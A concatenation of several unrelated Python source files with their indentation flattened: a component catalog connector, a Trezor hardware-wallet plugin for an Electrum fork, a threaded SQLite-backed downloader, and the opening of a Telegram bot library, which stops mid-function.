self.log.warning(f"Invalid directory -> {base_dir}")
continue
# Include '**/' in the glob pattern if files in subdirectories should be included
recursive_flag = "**/" if catalog_metadata.get("include_subdirs", False) else ""
patterns = [f"{recursive_flag}*{file_type}" for file_type in self._file_types]
for file_pattern in patterns:
catalog_entry_data.extend([
{
'base_dir': base_dir,
'path': self.get_relative_path_from_base(base_dir, str(absolute_path))
} for absolute_path in Path(base_dir).glob(file_pattern)
])
return catalog_entry_data
class UrlComponentCatalogConnector(ComponentCatalogConnector):
"""
Read a singular component definition from a url
"""
def get_catalog_entries(self, catalog_metadata: Dict[str, Any]) -> List[Dict[str, Any]]:
"""
Returns a list of catalog_entry_data dictionary instances, one per entry in the given catalog.
:returns: a list of component_entry_data; for the UrlComponentCatalogConnector class this takes
the form:
{
'url': 'url_of_remote_component_definition'
}
"""
return [{'url': url} for url in catalog_metadata.get('paths')]
def read_catalog_entry(self,
catalog_entry_data: Dict[str, Any],
catalog_metadata: Dict[str, Any]) -> Optional[str]:
"""
Reads a component definition for a single catalog entry using the catalog_entry_data returned
from get_catalog_entries() and, if needed, the catalog metadata.
:param catalog_entry_data: for the UrlComponentCatalogConnector class this includes a 'url' key
:param catalog_metadata: UrlComponentCatalogConnector does not need this field to read
individual catalog entries
"""
url = catalog_entry_data.get('url')
try:
res = requests.get(url)
except Exception as e:
self.log.warning(f"Failed to connect to URL for component: {url}: {e}")
else:
if res.status_code != HTTPStatus.OK:
self.log.warning(f"Invalid location for component: {url} (HTTP code {res.status_code})")
else:
return res.text
return None
def get_hash_keys(self) -> List[Any]:
"""
For the UrlComponentCatalogConnector class, only the 'url' value is needed
from the catalog_entry_data dictionary to construct a unique hash id for a
single catalog entry
"""
return ['url']
|
plugin.py
|
import base64
import re
import threading
from binascii import hexlify, unhexlify
from functools import partial
from electrum_rby.util import bfh, bh2u
from electrum_rby.bitcoin import (is_segwit_address, b58_address_to_hash160, xpub_from_pubkey,
public_key_to_p2pkh, EncodeBase58Check,
TYPE_ADDRESS, TYPE_SCRIPT,
TESTNET, ADDRTYPE_P2PKH, ADDRTYPE_P2SH, ADDRTYPE_P2SH_ALT)
from electrum_rby.i18n import _
from electrum_rby.plugins import BasePlugin, hook
from electrum_rby.transaction import deserialize, Transaction
from electrum_rby.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class TrezorCompatibleKeyStore(Hardware_KeyStore):
def get_derivation(self):
return self.derivation
def is_segwit(self):
return self.derivation.startswith("m/49'/")
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by %s') % self.device)
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorCompatiblePlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.main_thread = threading.current_thread()
# FIXME: move to base class when Ledger is fixed
if self.libraries_available:
self.device_manager().register_devices(self.DEVICE_IDS)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def _try_bridge(self, device):
self.print_error("Trying to connect over Trezor Bridge...")
try:
return self.bridge_transport({'path': hexlify(device.path)})
except BaseException as e:
self.print_error("cannot connect to bridge", str(e))
return None
def create_client(self, device, handler):
# disable bridge because it seems to never returns if keepkey is plugged
#transport = self._try_bridge(device) or self._try_hid(device)
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated %s firmware for device labelled %s. Please '
'download the updated firmware from %s') %
(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if TESTNET else "Rubycoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your %s.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your %s, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
) % (self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target = self._initialize_device, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
wizard.loop.exec_()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER and self.device == 'TREZOR':
# Warn user about firmware lameness
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"))
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
wizard.loop.exit(0)
def setup_device(self, device_info, wizard):
'''Called when creating a new wallet. Select the device to use. If
the device is uninitialized, go through the intialization
process.'''
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m')
client.used()
def get_xpub(self, device_id, derivation, wizard):
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True, keystore.is_segwit())
outputs = self.tx_outputs(keystore.get_derivation(), tx, keystore.is_segwit())
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = bh2u(signed_tx)
tx.update_signatures(raw)
def show_address(self, wallet, address):
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
wallet.keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
segwit = wallet.keystore.is_segwit()
script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDADDRESS
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
def tx_inputs(self, tx, for_sig=False, segwit=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDADDRESS
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = map(f, x_pubkeys)
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDMULTISIG
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if 'scriptSig' in txin:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx, segwit=False):
outputs = []
has_change = False
for _type, address, amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None and not has_change:
has_change = True # no more than one change address
addrtype, hash_160 = b58_address_to_hash160(address)
index, xpubs, m = info
if len(xpubs) == 1:
script_type = self.types.PAYTOP2SHWITNESS if segwit else self.types.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index)
txoutputtype = self.types.TxOutputType(
amount = amount,
script_type = script_type,
address_n = address_n,
)
else:
script_type = self.types.PAYTOP2SHWITNESS if segwit else self.types.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d"%index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [ self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys = pubkeys,
signatures = [b''] * len(pubkeys),
m = m)
txoutputtype = self.types.TxOutputType(
multisig = multisig,
amount = amount,
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index),
script_type = script_type)
else:
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the trezor libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
downloader.py
|
#!/usr/bin/env python
# _*_ coding: utf-8 _*_
# @author: XYZ
# @file: downloader.py
# @time: 2021.02.23 16:27
# @desc:
import os
import pickle
import sqlite3
import threading
from multiprocessing import JoinableQueue
from nspider.core.log import Log
import nspider.utilities.constant as const
from nspider.core.tps_bucket import TPSBucket
import nspider.utilities.common as common
class Downloader(object):
def __init__(self, tps, thread_num):
self.tps = tps
self.thread_num = thread_num
self.tps_bucket = TPSBucket(expected_tps=self.tps)
self.tps_bucket.start()
self.resource_queue = JoinableQueue(self.thread_num*2)
self.workers = []
def start(self, parser, clear_cache=False):
self.log = Log(parser.name() + ".download.log")
self.parser_db_path = os.path.join(const.CACHE_DIR, parser.name() + ".db")
self.db_path = os.path.join(const.CACHE_DIR, parser.name() + ".download.db")
if clear_cache:
try:
os.remove(self.db_path)
except Exception as err:
self.log.logger.exception(err)
self.conn = sqlite3.connect(self.db_path, check_same_thread=False, isolation_level=None)
self.conn_p = sqlite3.connect(self.parser_db_path, check_same_thread=False, isolation_level=None)
self.__init_db()
self.__init_fetcher()
self.__init_workers()
self.__wait()
self.log.logger.info("Exit")
def __init_workers(self):
for i in range(self.thread_num):
worker = threading.Thread(target=self.__worker_process, args=(str(i),))
worker.setDaemon(True)
self.workers.append(worker)
for worker in self.workers:
worker.start()
def __init_fetcher(self):
self.fetcher = threading.Thread(target=self.__fetcher_process)
self.fetcher.setDaemon(True)
self.fetcher.start()
def __wait(self):
self.fetcher.join()
def __init_db(self):
c = self.conn.cursor()
c.execute('pragma journal_mode=wal;')
create_resource_done_table = "CREATE TABLE if not exists {} (id INTEGER PRIMARY KEY, {} TEXT)".format(
const.RESOURCE_DONE_TABLE, const.COLUMN_NAME_FINGERPRINT)
create_resource_failed_table = "CREATE TABLE if not exists {} (id INTEGER PRIMARY KEY, {} TEXT, {} BLOB)".format(
const.RESOURCE_FAILED_TABLE, const.COLUMN_NAME_FINGERPRINT, const.COLUMN_NAME_RESOURCE)
for t in [create_resource_done_table, create_resource_failed_table]:
c.execute(t)
def __fetcher_process(self):
c= self.conn.cursor()
c_p = self.conn_p.cursor()
resources = c_p.execute("SELECT * FROM {}".format(const.PARSER_RESOURCE_TABLE))
for resource in resources:
c.execute("SELECT {} FROM {} WHERE id=? AND fingerprint=?".format(const.COLUMN_NAME_FINGERPRINT,
const.RESOURCE_DONE_TABLE),
(resource[0], resource[1],))
if c.fetchone():
pass
else:
self.resource_queue.put((resource[0], pickle.loads(resource[2])))
self.log.logger.info("Fetcher put all resources in the queue, now waiting for workers finish jobs")
self.resource_queue.join()
def before_download(self, resource):
return resource
def __worker_process(self, name):
self.log.logger.info("Worker {} start to work".format(name))
c = self.conn.cursor()
while True:
(id_, resource) = self.resource_queue.get()
while True:
if self.tps_bucket.get_token():
break
resource = self.before_download(resource)
if not resource:
raise Exception("function before_download must return resource object")
self.log.logger.info("Worker {} trying downloading {}".format(name, resource.url))
res = self.download(resource)
if res:
c.execute("INSERT OR IGNORE INTO {}(id, {}) VALUES (?, ?)".format(const.RESOURCE_DONE_TABLE,
const.COLUMN_NAME_FINGERPRINT),
(id_, resource.fingerprint,))
if (resource.callback):
resource.callback()
else:
c.execute("INSERT OR IGNORE INTO {}(id, {}, {}) VALUES (?, ?, ?)".format(const.RESOURCE_FAILED_TABLE,
const.COLUMN_NAME_FINGERPRINT, const.COLUMN_NAME_RESOURCE),
(id_, resource.fingerprint, pickle.dumps(resource)))
if(resource.errback):
resource.errback()
self.resource_queue.task_done()
def download(self, resource):
return common.download(resource.url, filename=resource.filename, save_dir=resource.save_dir, stream=resource.stream,
verbose=resource.verbose, try_num=resource.try_num, fix_type=resource.fix_type, cookies=resource.cookies,
headers=resource.headers, params=resource.params, data=resource.data, session=resource.session, proxies=resource.proxies,
log=self.log.logger.info,
log_exception=self.log.logger.exception)
|
__init__.py
|
import bisect
import collections
import inspect
import io
import json
import queue
import threading
import time
import logging
import traceback
from typing import Union
from . import exception
__version__ = '2.0.1'
def flavor(msg):
"""
Return flavor of message or event.
A message's flavor may be one of these:
- ``chat``
- ``callback_query``
- ``inline_query``
- ``chosen_inline_result``
- ``shipping_query``
- ``pre_checkout_query``
An event's flavor is determined by the single top-level key.
"""
if 'message_id' in msg:
return 'chat'
if 'id' in msg and 'chat_instance' in msg:
return 'callback_query'
if 'id' in msg and 'query' in msg:
return 'inline_query'
if 'result_id' in msg:
return 'chosen_inline_result'
if 'id' in msg and 'shipping_address' in msg:
return 'shipping_query'
if 'id' in msg and 'total_amount' in msg:
return 'pre_checkout_query'
top_keys = list(msg.keys())
if len(top_keys) == 1:
return top_keys[0]
raise exception.BadFlavor(msg)
chat_flavors = ['chat']
inline_flavors = ['inline_query', 'chosen_inline_result']
def _find_first_key(d, keys):
for k in keys:
if k in d:
return k
logging.error('No suggested keys %s in %s' % (str(keys), str(d)))
# Gets the first key after the update_id one.
return list(d.keys())[1]
all_content_types = [
'text', 'audio', 'animation', 'document', 'game', 'photo', 'sticker', 'video', 'voice',
'video_note', 'contact', 'poll', 'location', 'venue', 'new_chat_member', 'left_chat_member',
'new_chat_title', 'new_chat_photo', 'delete_chat_photo', 'group_chat_created', 'supergroup_chat_created',
'channel_chat_created', 'migrate_to_chat_id', 'migrate_from_chat_id', 'pinned_message',
'new_chat_members', 'invoice', 'successful_payment'
]
def glance(msg, flavor='chat', long=False):
"""
Extract "headline" info about a message.
Use parameter ``long`` to control whether a short or long tuple is returned.
When ``flavor`` is ``chat``
(``msg`` being a `Message <https://core.telegram.org/bots/api#message>`_ object):
- short: (content_type, ``msg['chat']['type']``, ``msg['chat']['id']``)
- long: (content_type, ``msg['chat']['type']``, ``msg['chat']['id']``, ``msg['date']``, ``msg['message_id']``)
*content_type* can be: ``text``, ``audio``, ``document``, ``game``, ``photo``, ``sticker``, ``video``, ``voice``,
``video_note``, ``contact``, ``location``, ``venue``, ``new_chat_member``, ``left_chat_member``, ``new_chat_title``,
``new_chat_photo``, ``delete_chat_photo``, ``group_chat_created``, ``supergroup_chat_created``,
``channel_chat_created``, ``migrate_to_chat_id``, ``migrate_from_chat_id``, ``pinned_message``,
``new_chat_members``, ``invoice``, ``successful_payment``.
When ``flavor`` is ``callback_query``
(``msg`` being a `CallbackQuery <https://core.telegram.org/bots/api#callbackquery>`_ object):
- regardless: (``msg['id']``, ``msg['from']['id']``, ``msg['data']``)
When ``flavor`` is ``inline_query``
(``msg`` being a `InlineQuery <https://core.telegram.org/bots/api#inlinequery>`_ object):
- short: (``msg['id']``, ``msg['from']['id']``, ``msg['query']``)
- long: (``msg['id']``, ``msg['from']['id']``, ``msg['query']``, ``msg['offset']``)
When ``flavor`` is ``chosen_inline_result``
(``msg`` being a `ChosenInlineResult <https://core.telegram.org/bots/api#choseninlineresult>`_ object):
- regardless: (``msg['result_id']``, ``msg['from']['id']``, ``msg['query']``)
When ``flavor`` is ``shipping_query``
(``msg`` being a `ShippingQuery <https://core.telegram.org/bots/api#shippingquery>`_ object):
- regardless: (``msg['id']``, ``msg['from']['id']``, ``msg['invoice_payload']``)
When ``flavor`` is ``pre_checkout_query``
(``msg`` being a `PreCheckoutQuery <https://core.telegram.org/bots/api#precheckoutquery>`_ object):
- short: (``msg['id']``, ``msg['from']['id']``, ``msg['invoice_payload']``)
- long: (``msg['id']``, ``msg['from']['id']``, ``msg['invoice_payload']``, ``msg['currency']``, ``msg['total_amount']``)
"""
def gl_chat():
content_type = _find_first_key(msg, all_content_types)
if long:
return content_type, msg['chat']['type'], msg['chat']['id'], msg['date'], msg['message_id']
return content_type, msg['chat']['type'], msg['chat']['id']
def gl_callback_query():
return msg['id'], msg['from']['id'], msg['data']
def gl_inline_query():
if long:
return msg['id'], msg['from']['id'], msg['query'], msg['offset']
return msg['id'], msg['from']['id'], msg['query']
def gl_chosen_inline_result():
return msg['result_id'], msg['from']['id'], msg['query']
def gl_shipping_query():
return msg['id'], msg['from']['id'], msg['invoice_payload']
def gl_pre_checkout_query():
if long:
return msg['id'], msg['from']['id'], msg['invoice_payload'], msg['currency'], msg['total_amount']
return msg['id'], msg['from']['id'], msg['invoice_payload']
try:
fn = {'chat': gl_chat,
'callback_query': gl_callback_query,
'inline_query': gl_inline_query,
'chosen_inline_result': gl_chosen_inline_result,
'shipping_query': gl_shipping_query,
'pre_checkout_query': gl_pre_checkout_query}[flavor]
except KeyError:
raise exception.BadFlavor(flavor)
return fn()
def flance(msg, long=False):
"""
A combination of :meth:`amanobot.flavor` and :meth:`amanobot.glance`,
return a 2-tuple (flavor, headline_info), where *headline_info* is whatever extracted by
:meth:`amanobot.glance` depending on the message flavor and the ``long`` parameter.
"""
f = flavor(msg)
g = glance(msg, flavor=f, long=long)
return f, g
def peel(event):
"""
Remove an event's top-level skin (where its flavor is determined), and return
the core content.
"""
return list(event.values())[0]
def fleece(event):
"""
A combination of :meth:`amanobot.flavor` and :meth:`amanobot.peel`,
return a 2-tuple (flavor, content) of an event.
"""
return flavor(event), peel(event)
def is_event(msg):
"""
Return whether the message looks like an event. That is, whether it has a flavor
that starts with an underscore.
"""
return flavor(msg).startswith('_')
def origin_identifier(msg):
"""
Extract the message identifier of a callback query's origin. Returned value
is guaranteed to be a tuple.
``msg`` is expected to be ``callback_query``.
"""
if 'message' in msg:
return msg['message']['chat']['id'], msg['message']['message_id']
if 'inline_message_id' in msg:
return msg['inline_message_id'],
raise ValueError()
def message_identifier(msg):
"""
Extract an identifier for message editing. Useful with :meth:`amanobot.Bot.editMessageText`
and similar methods. Returned value is guaranteed to be a tuple.
``msg`` is expected to be ``chat`` or ``choson_inline_result``.
"""
if 'chat' in msg and 'message_id' in msg:
return msg['chat']['id'], msg['message_id']
if 'inline_message_id' in msg:
return msg['inline_message_id'],
raise ValueError()
def _dismantle_message_identifier(f):
if isinstance(f, tuple):
if len(f) == 2:
return {'chat_id': f[0], 'message_id': f[1]}
if len(f) == 1:
return {'inline_message_id': f[0]}
raise ValueError()
else:
return {'inline_message_id': f}
def _split_input_media_array(media_array):
def ensure_dict(input_media):
if isinstance(input_media, tuple) and hasattr(input_media, '_asdict'):
return input_media._asdict()
if isinstance(input_media, dict):
return input_media
raise ValueError()
def given_attach_name(input_media):
if isinstance(input_media['media'], tuple):
return input_media['media'][0]
return None
def attach_name_generator(used_names):
x = 0
while 1:
x += 1
name = 'media' + str(x)
if name in used_names:
continue
yield name
def split_media(input_media, name_generator):
file_spec = input_media['media']
# file_id, URL
if _isstring(file_spec):
return input_media, None
# file-object
# (attach-name, file-object)
# (attach-name, (filename, file-object))
if isinstance(file_spec, tuple):
name, f = file_spec
else:
name, f = next(name_generator), file_spec
m = input_media.copy()
m['media'] = 'attach://' + name
return (m, (name, f))
ms = [ensure_dict(m) for m in media_array]
used_names = [given_attach_name(m) for m in ms if given_attach_name(m) is not None]
name_generator = attach_name_generator(used_names)
splitted = [split_media(m, name_generator) for m in ms]
legal_media, attachments = map(list, zip(*splitted))
files_to_attach = dict([a for a in attachments if a is not None])
return legal_media, files_to_attach
def _isstring(s):
return isinstance(s, str)
def _isfile(f):
return isinstance(f, io.IOBase)
from . import helper
def flavor_router(routing_table):
router = helper.Router(flavor, routing_table)
return router.route
class _BotBase:
def __init__(self, token: str, raise_errors: bool, api_endpoint: str):
self._token = token
self._raise_errors = raise_errors
self._base_url = api_endpoint
self._file_chunk_size = 65536
def _strip(params, more=[]):
return {key: value for key, value in params.items() if key not in ['self'] + more}
def _rectify(params):
def make_jsonable(value):
if isinstance(value, list):
return [make_jsonable(v) for v in value]
if isinstance(value, dict):
return {k: make_jsonable(v) for k, v in value.items() if v is not None}
if isinstance(value, tuple) and hasattr(value, '_asdict'):
return {k: make_jsonable(v) for k, v in value._asdict().items() if v is not None}
return value
def flatten(value):
v = make_jsonable(value)
if isinstance(v, (dict, list)):
return json.dumps(v, separators=(',', ':'))
return v
# remove None, then json-serialize if needed
return {k: flatten(v) for k, v in params.items() if v is not None}
from . import api
class Bot(_BotBase):
class Scheduler(threading.Thread):
# A class that is sorted by timestamp. Use `bisect` module to ensure order in event queue.
Event = collections.namedtuple('Event', ['timestamp', 'data'])
Event.__eq__ = lambda self, other: self.timestamp == other.timestamp
Event.__ne__ = lambda self, other: self.timestamp != other.timestamp
Event.__gt__ = lambda self, other: self.timestamp > other.timestamp
Event.__ge__ = lambda self, other: self.timestamp >= other.timestamp
Event.__lt__ = lambda self, other: self.timestamp < other.timestamp
Event.__le__ = lambda self, other: self.timestamp <= other.timestamp
def __init__(self):
super(Bot.Scheduler, self).__init__()
self._eventq = []
self._lock = threading.RLock() # reentrant lock to allow locked method calling locked method
self._event_handler = None
def _locked(fn):
def k(self, *args, **kwargs):
with self._lock:
return fn(self, *args, **kwargs)
return k
@_locked
def _insert_event(self, data, when):
ev = self.Event(when, data)
bisect.insort(self._eventq, ev)
return ev
@_locked
def _remove_event(self, event):
# Find event according to its timestamp.
# Index returned should be one behind.
i = bisect.bisect(self._eventq, event)
# Having two events with identical timestamp is unlikely but possible.
# I am going to move forward and compare timestamp AND object address
# to make sure the correct object is found.
while i > 0:
i -= 1
e = self._eventq[i]
if e.timestamp != event.timestamp:
raise exception.EventNotFound(event)
elif id(e) == id(event):
self._eventq.pop(i)
return
raise exception.EventNotFound(event)
@_locked
def _pop_expired_event(self):
if not self._eventq:
return None
if self._eventq[0].timestamp <= time.time():
return self._eventq.pop(0)
return None
def event_at(self, when, data):
"""
Schedule some data to emit at an absolute timestamp.
:type when: int or float
:type data: dictionary
:return: an internal Event object
"""
return self._insert_event(data, when)
def event_later(self, delay, data):
"""
Schedule some data to emit after a number of seconds.
:type delay: int or float
:type data: dictionary
:return: an internal Event object
"""
return self._insert_event(data, time.time() + delay)
def event_now(self, data):
"""
Emit some data as soon as possible.
:type data: dictionary
:return: an internal Event object
"""
return self._insert_event(data, time.time())
def cancel(self, event):
"""
Cancel an event.
:type event: an internal Event object
"""
self._remove_event(event)
def run(self):
while 1:
e = self._pop_expired_event()
while e:
if callable(e.data):
d = e.data() # call the data-producing function
if d is not None:
self._event_handler(d)
else:
self._event_handler(e.data)
e = self._pop_expired_event()
time.sleep(0.1)
def run_as_thread(self):
self.daemon = True
self.start()
def on_event(self, fn):
self._event_handler = fn
def __init__(self, token: str, raise_errors: bool = True, api_endpoint: str = "https://api.telegram.org"):
super(Bot, self).__init__(token, raise_errors, api_endpoint)
self._scheduler = self.Scheduler()
self._router = helper.Router(flavor, {'chat': lambda msg: self.on_chat_message(msg),
'callback_query': lambda msg: self.on_callback_query(msg),
'inline_query': lambda msg: self.on_inline_query(msg),
'chosen_inline_result': lambda msg: self.on_chosen_inline_result(msg)})
# use lambda to delay evaluation of self.on_ZZZ to runtime because
# I don't want to require defining all methods right here.
@property
def scheduler(self):
return self._scheduler
@property
def router(self):
return self._router
def handle(self, msg):
self._router.route(msg)
def _api_request(self, method, params=None, files=None, raise_errors=None, **kwargs):
return api.request((self._base_url, self._token, method, params, files),
raise_errors=raise_errors if raise_errors is not None else self._raise_errors, **kwargs)
def _api_request_with_file(self, method, params, files, **kwargs):
params.update({
k: v for k, v in files.items() if _isstring(v)})
files = {
k: v for k, v in files.items() if v is not None and not _isstring(v)}
return self._api_request(method, _rectify(params), files, **kwargs)
def getMe(self):
""" See: https://core.telegram.org/bots/api#getme """
return self._api_request('getMe')
def logOut(self):
""" See: https://core.telegram.org/bots/api#logout """
return self._api_request('logOut')
def close(self):
""" See: https://core.telegram.org/bots/api#close """
return self._api_request('close')
def sendMessage(self, chat_id: Union[int, str], text: str,
parse_mode: str = None,
entities=None,
disable_web_page_preview: bool = None,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None,
reply_markup=None):
""" See: https://core.telegram.org/bots/api#sendmessage """
p = _strip(locals())
return self._api_request('sendMessage', _rectify(p))
def forwardMessage(self, chat_id: Union[int, str], from_chat_id: Union[int, str], message_id: int,
disable_notification: bool = None):
""" See: https://core.telegram.org/bots/api#forwardmessage """
p = _strip(locals())
return self._api_request('forwardMessage', _rectify(p))
def copyMessage(self, chat_id: Union[int, str], from_chat_id: Union[int, str], message_id: int,
caption: str = None,
parse_mode: str = None,
caption_entities=None,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None,
reply_markup=None):
""" See: https://core.telegram.org/bots/api#copymessage """
p = _strip(locals())
return self._api_request('copyMessage', _rectify(p))
def sendPhoto(self, chat_id: Union[int, str], photo,
caption: str = None,
parse_mode: str = None,
caption_entities=None,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#sendphoto
:param photo:
- string: ``file_id`` for a photo existing on Telegram servers
- string: HTTP URL of a photo from the Internet
- file-like object: obtained by ``open(path, 'rb')``
- tuple: (filename, file-like object).
"""
p = _strip(locals(), more=['photo'])
return self._api_request_with_file('sendPhoto', _rectify(p), {'photo': photo})
def sendAudio(self, chat_id: Union[int, str], audio,
caption: str = None,
parse_mode: str = None,
caption_entities=None,
duration=None,
performer=None,
title=None,
thumb=None,
disable_notification: bool = None,
